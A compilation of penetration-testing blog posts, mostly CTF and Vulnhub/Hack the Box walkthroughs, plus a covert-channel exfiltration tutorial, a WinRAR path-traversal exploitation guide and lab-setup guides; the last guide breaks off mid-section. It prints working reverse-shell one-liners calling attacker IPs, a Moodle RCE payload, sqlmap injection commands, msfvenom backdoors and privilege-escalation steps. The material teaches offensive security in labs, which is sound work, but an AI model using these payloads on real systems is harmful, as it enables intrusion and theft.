We copied the script contents and then we moved the session we had on the target machine and here we edited the backup.sh file with our script using the echo command.

echo "0<&171-;exec 171<>/dev/tcp/192.168.1.4/4455;sh <&171 >&171 2>&171" > backup.sh

cat backup.sh

On a new terminal, we started a netcat listener on the port that we mentioned while creating the script using msfvenom. When we ran the file backup.sh file, we have a root session. Being an improper shell, we improved it using the python one-liner. Here, we traversed in the root directory. We found the root flag here in this directory as shown in the given image.

nc -lvp 4455
id
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd /root
ls
cat flag.txt

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post SP eric: Vulnhub Lab Walkthrough appeared first on Hacking Articles.

Generally, the hacker uses a hidden network to escape themselves from firewall and IDS such. In this post, you will learn how to steal information from the target machine through the undetectable network. Such type of network is known as a covert channel which seems as generic traffic to any network monitor device/application and network admin. It could be considered as steganography, but it is not exactly steganography. Two endpoint users can use the covert channel for undetectable communication from network admin.

The red teamers use covert channels for data exfiltration in red teaming operations through a legitimate network and the data exfiltration is a process of secretly sharing data between two endpoints.

Table of Content

What is Covert channel

Type of covert channel

Covert channel attack using tunnelshell

What is Tunnelshell
Covert ICMP Channel
Covert HTTP Channel
Covert DNS Channel

What is the covert channel?

The word covert means “hidden or undetectable” and Channel is “communication mode”, hence a covert channel denotes an undetectable network of communication. This makes the transmission virtually undetectable by administrators or users through a secret channel. It’s very essential to know the difference between encrypted communication and covert communication. In covert communication, the data stream is garbled and lasting by an unauthorized party. However, encrypted communications do not hide the fact that there has been a communication by encrypted the data travelling between both endpoints.

Type of covert channel

Storage covert Channel: Communicate by modifying a “storage location”, that would allow the direct or indirect writing of a storage location by one process and the direct or indirect reading of it by another.

Timing Covert channels – Perform operations that affect the “real response time observed” by the receiver.

Note: The well – known Spectre and Meltdown use a system’s page cache as their covert channel for exfiltrating data.

The specter and Meltdown attacks work by tricking your computer into caching privileged memory and through miscalculated speculative execution, a lack of privilege checking in out-of-order execution, and the power of the page cache. Once privileged memory is accessed the processor caches the information and the processor is able to retrieve it from the cache, regardless of whether its privileged information or not.

Read the complete article from here.

Covert Channel Attack Using Tunnelshell

It is possible to use almost any protocol to make a covert channel. The huge majority of covert channel research has based on layer 3 (Network) and layer 4 (Transport) protocols such as ICMP, IP and TCP. Layer 7 (Application) protocols such as HTTP and DNS are also frequently used. This mechanism for conveying the information without alerting network firewalls and IDSs and moreover undetectable by netstat.

What is tunnelshell?

Tunnelshell is a program written in C for Linux users that works with a client-server paradigm. The server opens a /bin/sh that clients can access through a virtual tunnel. It works over multiple protocols, including TCP, UDP, ICMP, and RawIP, will work. Moreover, packets can be fragmented to evade firewalls and IDS.

Let’s go with practical for more details.

Requirement

Server (Kali Linux)
Client (Ubuntu18.04)
Tool for Covert Channel (Tunnelshell) which you can download from here.

Here, I’m assuming we already have a victim’s machine session through the c2 server. Now we need to create a hidden communication channel for data exfiltration, therefore, install tunnelshell on both endpoints.

Once you download it, then extract the file and compile it as shown below:

tar xvfz tunnelshell_2.3.tgz
make

Similarly, repeat the same at the other endpoint (victim’s machine) and after completion, execute the following command in the terminal to open communication channel for the server (Attacker).

sudo ./tunneld

By default, it sends fragment packet, which reassembles at the destination to evade from firewall and IDS.

Now to connect with tunnelshell we need to execute the following command on the server (Attacker’s machine) which will establish a covert channel for data exfiltration.

Syntax: ./tunnel -i <session id (0-65535)> -d <delay in sending packets> -s <packet size> -t <tunnel type> -o <protocol> -p <port> -m <ICMP query> -a <ppp interface> <Victim’s IP>

./tunnel -t frag 10.10.10.2

frag: It uses IPv4 fragmented packets to encapsulate data. When some routers and firewalls (like Cisco routers and default Linux installation) receives fragmented packets without headers for the fourth layer, they permit pass it even if they have a rule that denies it. As you can observe that it is successfully connected to 10.10.10.2 and we are to access the shell of the victim’s machine.

As I had said, if you will check the network statics using netstat then you will not observe any process ID for tunnelshell. From the given below image, you can observe that with the help of ps command I had checked in process for tunnelshell and then try to check its process id through netstat.

ps |grep .tunneld
netstat –ano

Let’s take a look of network traffic generated between 10.10.10.1 (Attacker’s IP) and10. 10.10.2 (Victim’s IP) using Wireshark. The network flow looks generic between both endpoints, but if it monitors properly, then a network administrator could sniff the data packet. As you can observe that Wireshark has captured the covert traffic and sniff the data that was travelling between two endpoint devices.

Covert ICMP Channel

As we know Ping is the use of ICMP communication that use icmp echo request and icmp echo reply query to establish a connection between two hosts, therefore, execute the below command:

sudo ./tunneld -t icmp -m echo-reply, echo

Now to connect with tunnelshell we need to execute the following command on the server (Attacker’s machine) which will establish a covert channel for data exfiltration.

./tunnel -t icmp -m echo-reply,echo 10.10.10.2

As you can observe that it is successfully connected to 10.10.10.2 and the attacker is able to access the shell of the victim’s machine.

Again, if you will capture the traffic through Wireshark then you will notice the ICMP echo request and reply packet is being travelled between both endpoints. And if you will try to analysis these packets then you will be able to see what kind of payload is travelling as ICMP data.

Covert HTTP Channel

It establishes a virtual TCP connection without using three-way handshakes. It doesn’t bind any port, so you can use a port already use it by another process, therefore execute the below command:

sudo  ./tunneld -t tcp -p 80,2000

Now to connect with tunnelshell we need to execute the following command on the server (Attacker’s machine) which will establish a covert channel for data exfiltration.

./tunnel -t tcp -p 80,2000 10.10.10.2

As you can observe that it is successfully connected to 10.10.10.2 and again attacker is able to access the shell of the victim’s machine.

on other side, if you consider the network traffic then you will notice a tcp communication establish without three-way-handshake between source and destination.

Covert DNS Channel

To establish DNS covert channel, we need to run UDP tunnel mode on both endpoint machines. Therefore, execute the following command on the victim’s machine:

sudo ./tunneld -t udp -p 53,2000

Similarly, execute following on your (Attacker) machine to connect with a tunnel.

./tunnel -t udp -p 53,2000 10.10.10.2

As you can observe here the DNS malformed packet contains the data travelling between both endpoint machine.

Conclusion: Covert channel does not send encrypted data packet while data exfiltration, therefore, it can easily sniff, and network admin can easily conduct data loss and risk management.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Covert Channel: The Hidden Network appeared first on Hacking Articles.

Today we are going to solve another CTF challenge “Teacher”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of Curling is 10.10.10.153

Penetrating Methodology

Scanning

Network Scanning (Nmap)

Enumeration

Web Spidering (dirb)
Abusing HTTP service
Password Fuzzing (Wfuzz)

Exploiting

Evil Teacher Attack
Obtain Netcat session
Get config.php to obtain the MySQL password
Connect to MySQL
Extract tables to obtain login credentials
Get user.txt

Privilege Escalation

Symlinking root directory
Get root.txt

Walkthrough

Scanning

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -sC -sV -p- 10.10.10.153

As you can observe that it has shown port 80 is open for http services.

We found a school website on exploring port 80, and I didn’t find a lot of information here. This website appears to be designed for online courses and the author may use some educational cms to design it.

Enumeration

Since it is a learning site that needs to be designed for online classes using a CMS platform. Therefore, I will go for the enumeration of the web directory without wasting much time.

dirb //10.10.10.153

If you notice the image below, you will find a web directory /moodle. The website is therefore proven to be designed on MOODLE CMS, let’s explore it further.

When I explored /10.10.10.153/moodle, it’s the “Giovanni Chhatta” teacher portal for online classes in Mathematics Algebra. If you’re looking for a moodle exploit, you’re going to see it vulnerable to SQL and RCE. So, to exploit it, we need to log in to this account, but we don’t have credentials.

I felt like the photo gallery looks suspicious while spidering because each row contains 4 tiles and one photo in the top left corner is missing.

Therefore, I check the source code of the page and there is some error where I saw picture 5. We need to download this picture to identify more about image error.

So, I downloaded this image 5 with the help of the wget command and identified the type of file.

wget //10.10.10.153/images/5.png
file 5.png

Though it looks like an image, it was ASCII file that we could open in any text editor. As you can see with the help of the cat command, I opened the 5.png file where I found the “Giovanni” user password clue.

PASSWORD HINT: “I forgot the last character of my password. The only part I remembered is Th4C00lTheacha”

Since the password’s last character was missing, I created a wordlist with the command below.

crunch 15 15 -t Th4C00lTheacha^ -o pass.txt

Now let use wfuzz for fuzzing brute force using wordlist to identify valid login combination.

 wfuzz -w pass.txt -L 20 -d "username=giovanni&password=FUZZ" -hw 1224 //10.10.10.153/moodle/login/index.php

WoW!! We got HTTP 200 ok response for Giovanni: Th4C00lTheacha#

Exploiting

We get inside the dashboard with the help of the above login credential. Now let’s try to exploit if you’re going to google for moodle exploit then it’s going to show you EVIL TEACHER attack which you can read from here.

We now need to edit a new activity in order to exploit it, so explore settings > edit > add an activity or resource. Now you’re going to get a prompt to select an activity you want to add, I’ve chosen a quiz here.

Then click on Ethical hacking quiz to add some question inside it.

Click on Edit option for adding a question.

Now click on Add > + a new question which will open a console to add quiz question.

Choose “calculated” the question type to add.

Now, when you ask a question, you need to mention the answer in the given text area, but this is vulnerable to EVIL TEACHER attack. Now get the reverse shell we insert a formula in the filed text given to write the answer and then click on save the changes.

1?><?=log(1){a.`$_GET[0]`.({x})}?>

Start netcat in the local machine and then inject netcat reverse shell payload in the URL as shown in the image, click on next page:

nc -lvp 1234
&0(data;nc -e /bin/bash <attacker-IP> <listening port>)

Repeat the same to inject nc payload once again and execute the URL to get a netcat session.

&0(data;nc -e /bin/bash <attacker-IP> <listening port>)

You can see here that we pwned the target machine’s web shell, let’s explore more to get user.txt and root.txt. So, I check the directory list inside /moodle here that I found a config.php file.

I saw mysql login credential inside the config.php file as shown below.

Connect to MySQL to extract information from the database such as credentials for system login.

mysql -u root -p'Welkom1' moodle
show tables;

Here mdl_user table looks more interesting, let’s extract its column information in the hop to get some useful information.

show columns from mdl_user;

WOW! WOW!! It includes the username and column of the password, let’s explore it.

select user,password from mdl_user;

Here I found 4 users with the md5 hash value, let’s try cracking them.

So, we got the password “expelled” by using the online md5 decryption tool.

Now use the credentials above and switch user account to try to locate the user.txt file.

su Giovanni 
password: expelled
ls
cat user.txt

Yeah! Yeah. We got our 1st flag successfully, now let’s find out about root.txt, but as we know it needs an escalation of privilege.

Privilege Escalation

So, while traversing, I found a backup_course.tar file inside /home/giovanni/work/tmp

I found a backup _course.tar file inside /home/giovanni/work/tmp while traversing.

Therefore, since the current directory has full permission, I try to link the root directory within the /tmp folder so that we can get backup of the root directory within the /tmp folder with the help of backup.sh.

ln -s /root tmp

Fantastic!! I found /root directory within /tmp after 1-2 minutes, which means that without root access we can get the root.txt file as shown below.

cd /tmp
ls
cd /root
ls
cat root.txt

Booom!! We found root.txt successfully!!!!!!!!!!!

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box: Teacher Walkthrough appeared first on Hacking Articles.

Today we are going to solve another CTF challenge “irked”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of irked is 10.10.10.117

Penetrating Methodology

Scanning
Enumerating
Exploiting
Get user.txt
Privilege Escalation
Get root.txt

Walkthrough

Scanning

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -p- -sV 10.10.10.117 --open

As you can see that port 22,80 is open for ssh, http services respectively, some other ports for IRC (unrealircd) are available.

It gave us a frustrated emoji when exploring port 80, as shown below, and some hints for irc are working. This image might have some hidden information, so I download this image and begin to penetrate it.

Enumeration

I tried to extract hidden information with the help of steghide, but it needs the passphrase for that. I search for unrealIRCd when this approach didn’t work.

Exploiting

Fortunately, I found an exploit for unrealircd in Metasploit, although the default port for ircd is 6667, it runs on 6697 here. I pwned the victim machine successfully after running the module.

use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.13
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

So, as you can see, we’ve got the victim’s machine command session, let’s penetrate more to get user.txt and root.txt. First, to obtain the appropriate terminal, we need to import pty shell, so type:

python -c 'import pty;pty.spawn("/bin/bash")'

I found user.txt within /home/djmardov/documents, but since we’re logged as an ircd, there’s no permission to read this file. There was also a .backup hidden file and it gave us a “UPupDOWNdownLRlrBAbaSSs” password.

We found frustrated emoji in the beginning, requiring a passphrase to extract the hidden text behind the image. So, as a passphrase, I use the password above and found a pass.txt file from within irked.jpg.

steghide extract -sf irked.jpg

I found another password from the inside pass.txt file “Kab6h+m+bbp2J: HG.”

Privilege Escalation

Now I use the following credential to connect with the victim’s machine through ssh.

Username: djmardov@10.10.10.117

Password: Kab6h+m+bbp2J:HG

First, I open the user.txt file and finish the first challenge along with that. Now let’s penetrate more to find the root.txt file, and that’s why we need to increase the privilege, so I’m trying to find out if there’s any suid permission script.

ssh djmardov@10.10.10.117
cat user.txt
find / -perm -u=s -type=f 2>/dev/null

Here /usr/bin/viewuser looks more interesting, let’s check it out.

So, when I run the program, I found that this application was being developed to set test user permissions but couldn’t find listusers file within /tmp. This program is, therefore, searching for data from the listusers file and the file is missing from the directory inside /tmp.

So what we can do is write a script to call bin / sh and save it as listusers inside /tmp and then run the viewuser to run it.

echo '/bin/sh' > /tmp/listusers
chmod 777 /tmp/listusers
/usr/bin/viewuser

Boom!! We have root access now, let’s grab the root.txt file and finish the assigned task.

cd /root
ls
cat root.txt

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box : Irked Walkthrough appeared first on Hacking Articles.

Hello friends! Today we are going to take another CTF challenge known as “SP ike”. The credit for making this VM machine goes to “Daniel Solstad”. Our goal is to get flags to complete the challenge.

Security Level: Intermediate

Penetrating Methodology:

Discovering Targets IP
Network scanning (Nmap)
Surfing HTTP service port
Configuring HEXCHAT IRC Client
Connecting to IRC Server
Creating PHP Malicious Script using MSFvenom
Using Netcat Listener
Spawning TTY Shell
Getting Root Access
Reading Final Flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.1.21

Time to scan the Target’s IP with nmap. Nmap scan result shows FOUR open ports, 80(http), 139(NetBIOS-ssn), 445(NetBIOS-ssn), 6667(IRC).

nmap -sV -T4 192.168.1.21

Since port 80 is running HTTP, so we thought of browsing Target’s IP in our browser. But it is not much of great help. Moving on.

Even directory scanning using dirb tool was not very useful. At last, we are left with the IRC chat server on port(6667). So, we used an IRC client Hexchat to connect to the port(6667). First, we need to configure Hexchat by Adding a New Profile and Editing Connection Details.

Now Edit the Network ike which we have added and Give the Target’s IP as you can see in the image.

We have successfully connected to the IRC Server. And we found something interesting that the server has a channel #php which has a phpbot, I guess it wouldn’t be a problem for the phpbot to execute a php script.

We created a msfvenom script to exploit the target machine. We used the reverse_netcat payload to create this script.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.34 lport=1234 R

After making a few tries, we finally able to execute our PHP script successfully. To get reverse shell execute the script given below.

!php $s=array(); $p=array(); proc_open("mkfifo /tmp/tsglu; nc 192.168.1.34 1234 0</tmp/tsglu | /bin/sh >/tmp/tsglu 2>&1; rm /tmp/tsglu", $s, $p);

Oh Yeah!! We got the reverse shell, but it is not a proper shell. We will spawn a tty shell using python. After doing sudo -l, we saw nmap can be used with root privileges. So to get root, we used commands given below and successfully got root access. Time to read the FLAG!!

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

The post SP ike: Vulnhub Lab Walkthrough appeared first on Hacking Articles.

In this post, we will discuss how to set-up our own web server for penetration testing on Ubuntu 18. Ubuntu 18 has updated with the new features.

Table of Content

Requirement

Web Server configuration

Apache
PHP
MySQL
phpMyAdmin
FTP
SSH
Nmap

Requirement-ubuntu 18.0

Web Server Configuration

The Web server is a program that uses HTTP to serve users with files forming web pages in response to requests transmitted by their HTTP clients.

The Web servers can also be called dedicated computers and apparatuses.

Install Apache

First, we will install the Apache. Apache is the most commonly used Web server on Linux Systems. Web servers are used to serve web pages requested by the client computers. So, let’s first install Apache in the ubuntu by the following command-

apt install apache2

We have successfully installed apache2, by default apache runs on port 80.

Install PHP

Now we will install PHP 7modukle for Apache 2 and for all of its dependencies. Earlier we used to install PHP 5 module for Ubuntu 14. But now as it is not compatible in ubuntu 18.so we will install the latest version of php which is php7.2 For this run the following command in ubuntu terminal-

apt install php7.2

As you can see, we have done with php installation.

Install MySQL Server

Now comes the next step which is the installation of MySQL server. MySQL is the famous open-source database which was very easier to install earlier. But now it requires some changes for Ubuntu 18.

So, let’s go ahead step by step.

First, we will install MySQL server by the following command-

apt get install mysql-server

So, we are done with the installation. In Ubuntu 14, MySQL did not need a password as it required only the root user to logged in. But now it needs a password and it won’t allow the root user to log in so we will provide a username and password of ubuntu in MySQL with the following command and as it will ask for the password; you have to use your ubuntu password here. After it gets logged in you will grant all the privileges to the user of Ubuntu as in our case we have given all the privileges to user raj which will be identified with the password of ubuntu which is 123 in our case and after which we will reset all the previous privileges so that it can start the service with the new changes. For this, the commands are the following.

mysql -u root -p
GRANT ALL PRIVILEGES ON *.* TO 'raj'@'%' IDENTIFIED BY '123' WITH GRANT OPTION;
flush privileges;

Great we are done with MySQL server installation, by default it runs on port 3306, now restart MySQL service.

service mysql restart

Install phpMyAdmin

Now the next step is the installation of a phpMyAdmin software tool which is written in PHP and which is proposed to handle the administration of MYSQL over the WEB and it also supports a wide range of operations on MYSQL. First, we need to install phpMyAdmin by the following command-

apt install phpmyadmin

After the installation, it will ask you to choose the web server. Here you need to choose apache2 which will automatically be configured to run phpmyadmin.

Next, you will get a prompt which will be opened to configure a database for phpmyadmin with dbconfig-common. Here you need to click on yes and the enter.

Again, you will get a prompt which will ask you to submit the password for phpMyAdmin, to register with the database server. Here we have given 123 as the password as it is essential to give it a password now.

The next step is the configuration of phpmyadmin under apache, for this we need to edit apache2 conf file by adding two lines at the end of this file:

nano /etc/apache2/apache2.conf

#phpMyAdmin Configuration 
Include /etc/phpmyadmin/apache.conf

At the last, as shown in the image below and then save it and after the editing saves the file and restart apache2 service.

service apache2 restart

Now open phpmyadmin in the browser as localhost/phpmyadmin as shown in the image below-

Install ftp

Now we will install FTP server in ubuntu which is used for the transfer of computer files between a client and server on a computer network. For this run the following command in the terminal-

apt install vsftpd

As we can see in the above screenshot that ftp service has been installed in our system which runs on port 21

Install ssh

Now the next is SSh protocol which is method for secure remote login from one computer to another.so lets install this service by the following command. It is installed successfully; by default, it runs on port 22.

apt install openssh-server

Install Nmap

Now in order to check that the above services have been installed properly in our system; we will use nmap which is a scanner for ports and which tells us about the open ports and running services status.

So, let’s install that by the following command-

apt install nmap

Once the installation is done, we will scan our own system by the following command and it will scan our system and will come up with the desired results as you can see in the image given below-

nmap 127.0.0.1

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Web Server Lab Setup for Penetration Testing appeared first on Hacking Articles.

In this post, we are going to discuss how WinRAR has patched serious security faults last month, one of the world’s most popular Windows file compression applications, which can only be exploited by tricking a WinRar user to extract malicious archives. The vulnerability identified last year by research.checkpoint.com affects all versions released in all WinRAR over the past 19 years.

More About Evil Winrar

CVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, and CVE-2018-20253

Patched Version: WinRAR 5.70 Beta 1

This vulnerability is due to the UNACEV2.DLL library included with all versions of WinRAR. The winrar uses the ACE format to compress the folder and unpack the compressed folder with the help of UNACE.DLL.

In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path. This happens due to improper compilation when unace.dll come into the face.

Let’s download a python script that will generate a malicious file archive in a rar format. Once you download the python script, install the dependency required for it.

git clone //github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen/
pip3 install -r requirements.txt

Further, you need to give full permission to the python script inside the Evil-Winrar-Gen folder and then generate a malicious exe file with the help of msfvenom and name as “winrar.exe” as shown and multi handler inside Metasploit.

chmod 777 evilWinRAR.py
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.110 lport=1234 -f exe > winrar.exe

Now create a text file that will display to the victim when he extracts the rar file to confuse him. Then execute evilWinrar python script along with malicious exe file and text file, creating a malicious archive that you can send to the target.

touch winrar.txt
./evilWinRAR.py -e winrar.exe -g winrar.txt
python -m SimpleHTTPServer 8080

As said, this vulnerability allows us to extract the malicious file in the arbitrary path, with the help of this script we will allow rar files extraction in the /startup program. Now use social engineering for transferring the malicious rar to the victim and wait for the victim to restart his machine to obtain reverse connection of the target.

There is currently no startup program in the target machine as shown below. Once the victim extracts the malicious rar file “evil.rar,” our winrar.exe backdoor will extract from the startup program.

To ensure for winrar.exe file in the startup folder, type shell:startup in the run prompt.

As soon as the victim will restart the machine, you will get a reverse connection as shown.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Code Execution from WinRAR appeared first on Hacking Articles.

Hello friends! Today we are going to take another boot2root challenge known as “DC-2”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.

Security Level: Beginner

Penetrating Methodology:

Discovering Targets IP
Network scanning (Nmap)
Adding the Domain name to Host file
Surfing HTTP service port
Using WPscan for Username enumeration
Using cewl for creating wordlist
Logging into WordPress
Logging in through SSH
Escaping restricted shell
Finding binary in the sudoers list
Getting root access and Reading final flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our Targets IP Address 192.168.1.101. Our next step is to scan our targets IP Address with nmap.

nmap -p- -A 192.168.1.101

OKAY!! With the following result of nmap scan, I found here port 7744 is used for SSH and port 80 for HTTP service, moreover there all it shows all http services are made to redirect on //dc-2.

Therefore, we thought of adding the Domain Name into our Host file, so that we will be able to access http services.

cat /etc/hosts

Since port 80 is open, we explored the Domain Name on the browser. We discovered the webpage got a WordPress CMS installed on it.

The Flag option on the webpage clearly got our attention. Let’s check what hint it has for us. So from this page, we got a really good hint to move ahead.

So, the first idea that came to us was to run a wpscan on the webpage and see what the scan enumerates.

wpscan --url //dc-2 --enumerate p --enumerate t --enumerate u

I found three user names: admin, jerry and Tom and as said above we need to use cewl which is used for generating a dictionary by spidering website.

Therefore, we have used cewl to build a wordlist for passwords from inside //dc-2 as shown in the image.

cewl //dc-2/ > password
cat password

So, we have a dictionary for passwords which we have generated using cewl and saved WordPress usernames in a text file.

cat users

Time to fire up wpscan with our username & password list to valid user login combination.

wpscan --url //dc-2 -U users -P password

We have successfully found the password for Tom & Jerry. Let’s make good use of them.

jerry: adipiscing
tom: parturient

Further, we login to WordPress using Jerry credentials. It was holding another clue for us in Flag 2.

Since the clue was telling us to find another entry point to reach our final flag. Suddenly we thought to make an SSH Login running on port 77454 by using Tom credentials.

We successfully got logged in but we have a restricted shell in which some commands are not found. But few commands are available.

ssh tom@192.168.1.101 -p 7744
ls
cat flag3.txt
echo $PATH
ls /home/tom/usr/bin

As you can observe that cat program is not present inside /bin and tom can run only five programs present inside /bin directory.

Since we had a restricted shell, we found that we can use the Vi editor. Therefore, we use Vi editor to escape the restricted shell.

After escaping the restricted shell, we export “/bin/bash” as our SHELL environment variable and “/usr/bin” as our PATH environment variable so that we can run Linux commands properly.

export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash:$SHELL

After that, we try to open flag3.txt again using cat command and luckily found next hint to move ahead.

ls
cat flag3.txt

According to hint, now we need to switch user from tom to jerry but we don’t have jerry’s login credential. Then checked the sudoers list and found that tom can run “/usr/bin/git” as root without a password.

sudo -l

Having the root permission on git was like the cherry on the cake, because through this I can try to escalate low privilege shell to high privilege shell.

sudo git help add

Since the help console of git opens with an editor where we can run below command. And for spawning root shell type !/bin/bash and hit enter.

Boom!!! We got the root access, then we switch to the root directory and found our final flag.

cd /root
ls
cat final-flag.txt

The post DC-2 Walkthrough appeared first on Hacking Articles.

Hello friends! Today we are going to take another boot2root challenge known as “DC-3”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.

Security Level: Beginner

Penetrating Methodology:

Discovering Targets IP
Network scanning (Nmap)
Surfing HTTP service port
Searching exploits via searchsploit
Using SQLMAP to dump databases information
Using John the Ripper to Crack the Password
Login into JOOMLA
Inject malicious PHP Reverse Shell Code
Using Netcat for obtaining reverse connection
Exploit the kernel
Getting root access
Reading Final flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our Targets IP Address 192.168.1.104; Our next step is to scan our targets IP Address with nmap.

nmap -A 192.168.1.104

From nmap result we found only HTTP service is running on port 80 and we got to know that JOOMLA CMS is installed on this website.

So, we navigate to port 80 by exploring target IP in the web browser and read the text message of the admin, moreover the website was running on Joomla CMS as found above.

So to identify installed Joomla version, we checked its Readme file. We can clearly come to know about the version of Joomla 3.7, I think this is might come in handy.

We looked for Joomla 3.7 in searchsploit and found JOOMLA SQL INJECTION exploit. We copied the exploits 42033.txt file on our machine and read it contents. It revealed a Command for Sqlmap along with a vulnerable URL.

Then we executed given below sqlmap command and with the help of it we look for the Database names that revealed database 5 entries as shown in the image given below where I notice joomladb.

sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Let’s again use Sqlmap to look for the tables and column.

sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch

After getting the table names, we have dumped the contents of table #_users using sqlmap, which revealed credentials which that come in handy to log into JOOMLA. But the password is encoded, we need to crack it. Time to fire up John up.

sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump --batch

We have saved the hash in our system and use john the ripper to crack the hash. Now we have both the credentials to log into Joomla.

Username- admin
Password- snoopy

Let’s login into Joomla as admin.

After spending some time exploring, we got an idea to add a malicious PHP code (available inside kali: /usr/share/webshells/php) in index.php of beez3 template for getting reverse shell as shown below.

On the other side, we set up a netcat listener. Upon Execution, we got the shell of the target system. To get a proper shell, we have used the python one-liner to spawn the TTY shell.

nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
uname -a
lsb_release -a

From the LSB description, we clearly knew for this version of Ubuntu has a direct exploit which can be used to get the root access and found our final flag.

Without wasting time, we found a privilege escalation exploit for ubuntu 16.04. We have downloaded it and extracted it.

cd /tmp
wget https://www.exploit-db.com/exploits/39772
unzip 39722.zip
ls
cd 39772
ls
tar -xvf exploit.tar

After running the exploit, we have easily got the root access and thus got our Final flag.

ls 
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
ls
./doubleput
cd root
ls
cat the-flag.txt

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

The post DC-3 Walkthrough appeared first on Hacking Articles.

As you know that we have already shown you how to configure web server. Now it’s time to move on to the next step which is the configuration of Web Application in Ubuntu 18. So today we will be learning how can we configure the 5 famous web applications (DVWA, bwapp, XVWA, SQLI, Mutillidae) in our web server for Web Penetration Testing. So, let’s do that.

Table of Content

Requirement
Web application
DVWA
bWAPP
XVWA
Sqli
Mutillidae

Requirement-ubuntu 18.0

Web Application

A web application is a remote server software application. In general, web browsers are used through a network, such as an internet, to access Web applications. Like a software program running on a desktop or desktop application, the Web-app permits interaction with the user and can be designed for a wide range of applications.

DVWA

Let’s start You should download and configure this web application only within the html directory for all web applications in the browser through localhost. Go to your Ubuntu terminal and move inside html directory by running the following command and then download dvwa lab from the given link.

cd /var/www/html
git clone //github.com/ethicalhack3r/DVWA

After the installation we will go inside the dvwa and there we will find a config folder, now we will move inside the config folder and there we will run the ls command to view all available folder, now, here you will see a config.inc.php.dist file. Now as you can see, we have moved config.inc.php.dist file to config.inc.php

cd /dvwa/config
mv config.inc.php.dist config.inc.php

Now open the config file by the following command; where you will find that db user is root and db password is password.

Here you need to make the changes and give access to the Ubuntu user as in our case we have written raj as db user and as our ubuntu password is 123 so we have written 123 as db password.

Now we will try to open dvwa lab in the browser by the following URL and click on Create/Reset Database

//localhost/dvwa/setup.php

Good! We have successfully configured the dvwa lab in ubuntu 18 as we can see that we are welcomed by the login page.

For login, we will use the dvwa username which is admin and password which is dvwa password by default.

bWAPP

A buggy web application that is purposely unsafe. Enthusiasts of security, system engineers, developers can find out about Web vulnerabilities and prevent them.

bWAPP prepares you for successful tests and penetration testing. Now we will configure bWAPP lab in Ubuntu 18. First, we will download bWAPP and then we will move inside the Downloads folder and then unzip the bWAPP file by the following command-

unzip bWAPP_latest.zip

Now we will move bWAPP into var/www/html by the following command-

mv bWAPP /var/www/html

Now we will edit the config file; so, move inside the config file by the following command and where you can see that db username is root and db password is bug b default.

cd admin
ls
nano setting.php

Now we will make some changes and will set our ubuntu user raj in place of root and set password 123 in place of bug. Save it and then exit the config file.

Now go to your browser and open bWAPP installation file by the following command and click on here as shown in the image below

//localhost/bWAPP/install.php

Now you will get a login page of bWAPP where we will use the default username which is bee and default password which is bug and you are logged in in bWAPP.

Now you can start working on bWAPP.

When you will login as bee:bug; you will get the portal to test your penetration testing skill.

XVWA

XVWA is poorly coded written in PHP/MYSQL web application that helps security lovers learn security from applications. This application is not advisable online because it is Vulnerable to extremes as the name also suggests. This application should be hosted in a controlled and safe environment where you can improve your skills with the tool of your choice. So, let’s start-

